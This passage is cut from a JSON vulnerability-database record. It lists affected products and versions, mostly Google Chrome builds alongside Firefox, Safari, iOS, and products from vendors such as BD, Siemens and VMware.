"18.0.1025.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.334.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.862.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.303" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "40.0.2214.91" }, { "model": "facsjazz", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "enterprise linux server extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-6.7" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.95" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.721.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "46.0.2490" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.90" }, { "model": "sql server for 32-bit systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "201240" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1030" }, { "model": "workstation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "12.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.51" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.336" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.32" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.602.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.211" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1058.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.79" }, { "model": "sql server for x64-based systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "201240" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.415.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.931.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.722.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.32" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.520.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1022" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "9.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.651.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.11" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.31" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.476.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.354.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.690.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.570.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.347.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.13" }, { "model": "vsphere integrated containers", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.2" }, { "model": "sinumerik d sl ncu730.3", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "840" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.11" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.344" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.412.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.44" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.634.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.329.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1085.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.664.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.26" }, { "model": "sinumerik d sl ncu730.3b", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "840" }, { "model": "lsr ii", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.596.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.69" }, { "model": "unified computing system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.730.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1060.0" }, { "model": "pyxis supply roller", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.40" }, { "model": "facscount", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.610.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.422.0" }, { "model": "windows server", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.48" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.299.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.371.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.56" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.615.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.599.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.99" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.452.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.102" }, { "model": "enterprise mrg", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.6" }, { "model": "focal point linux", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "-0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.92" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1675.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.50" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.28" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.873.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.301.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.116" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.2.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.794.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.42" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.781.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "53.0.2785.143" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1298.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.157.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.554.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.45" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "40.0.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.631.0" }, { "model": "communications lsms", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.102" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.477.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.941.0" }, { "model": "pyxis cathrack", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "v80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.516.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.430.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1684.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.457.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1289.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1008.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.943.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.21" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.3" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.609.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.211.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.582.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.589.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.41" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.575.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1663.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1280.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.21" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.122" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.95" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.726.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1034.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "60.0.3112.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.32" }, { "model": "rowa dose", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.716.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.480.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.45" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.700.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.28" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.154" }, { "model": "xen", "scope": "eq", "trust": 0.3, "vendor": "xen", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1684.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1652.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.627.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.4" }, { "model": "chrome", "scope": "eq", "trust": 